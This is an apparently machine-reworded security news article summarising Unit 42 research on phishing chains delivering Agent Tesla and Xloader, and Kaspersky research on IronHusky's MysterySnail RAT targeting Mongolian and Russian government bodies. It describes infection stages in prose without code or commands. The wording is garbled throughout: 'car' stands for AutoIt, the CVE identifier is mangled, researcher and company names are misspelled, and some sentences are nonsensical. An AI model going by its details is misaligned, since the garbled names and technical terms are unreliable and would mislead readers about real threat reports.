New multi-stage attacks have been observed offering malware families such as Agent Tesla Variant, Lenkoslat and Xloader.
“Attackers increasingly rely on such complex delivery mechanisms to avoid detection, bypass traditional sandboxes, and ensure successful delivery and execution of payloads,” Palo Alto Network Unit 42 researcher Saqib Khanzada said in a technical article in the campaign.
The starting point of the attack is a deceptive email that comes as an order request to deliver malicious 7-zip archive attachments containing javaScript-encoded (.jse) files.
A phishing email observed in December 2024 incorrectly claimed that a payment had been made, prompting recipients to review the attached order file. When you launch a JavaScript payload, an infection sequence will be triggered when a PowerShell script file from an external server acts as a downloader.
This script has a Base64 encoded payload that is then decrypted, written to a temporary Windows directory, and executed. Something interesting happens here. The attack leads to the next stage dropper, which is compiled using .NET or car.
For .NET executables, the encrypted embedded payload (an agent tesla variant suspected to be a snake keylogger or Xloader) is decoded and injected into the running “Regasm.exe” process, a technique observed in past Agent Tesla campaigns.
Meanwhile, car-compiled executables introduce additional layers to further complicate the analytics effort. The car script in the executable has an encrypted payload that is responsible for loading the final shellcode, which injects the .NET file into the “regsvcs.exe” process, which ultimately leads to the deployment of Agent Tesla.
“This suggests that attackers will use multiple execution paths to increase resilience and avoid detection,” Kanzada pointed out. “The focus of attackers remains on the multi-layered attack chain, not on sophisticated obfuscation.”
“Instead of focusing on very sophisticated techniques, by stacking simple stages, attackers can create resilient attack chains that complicate analysis and detection.”
Ironhusky offers a new version of Mysterysnail Rat
The disclosure came as Kaspersky detailed a campaign targeting government organizations in Mongolia and Russia with a new version of malware called Mysterysnail Rat. This activity is attributed to a Chinese-speaking threat actor called Ironhusky.
Ironhusky has been rated active since at least 2017 and was previously documented in October 2021 in connection with the provision of Win-2021-40449 zero-day exploitation, MysterySnail, a flaw in Win32K privilege escalation.
The infectious disease comes from a malicious Microsoft Management Console (MMC) script that mimics the word documents of the Mongolia National Land Agency (“Co-editored Letter_Alamgac”). The script is designed to retrieve zip archives using lure documentation, legitimate binaries (“ciscollabhost.exe”), and malicious dll (“ciscosparklauncher.dll”).
The nature of the lure document suggests that it may have been done via phishing campaigns, but it is not known exactly how the MMC scripts will be distributed to targets of interest.
As observed in many attacks, “Ciscocollabhost.exe” is used to sideload DLLs, the intermediary backdoor that can communicate with attacker-controlled infrastructure, by leveraging open source plumbing server projects.
Backdoor supports the ability to run a command shell, download/upload files, enumerate directory content, delete files, create new processes, and exit itself. These commands are used to sideload MysterySnail Rat.
The latest version of malware can accept almost 40 commands, perform file management operations, run commands via CMD.exe, generate and kill processes, manage services, and connect to network resources via dedicated DLL modules.
Kasperksy said attackers observed that after precautions were taken by affected companies to block intrusions, they dropped a “reused, lighter version” of the “Motherysnail” codenail called MysterySnail,” called MysterySnail.
“This version doesn’t have as many features as the Mysterysnail Rat version,” the company said. “It was programmed to have only 13 basic commands used to list the contents of a directory, write data to a file, and launch processes and remote shells.”
Source link
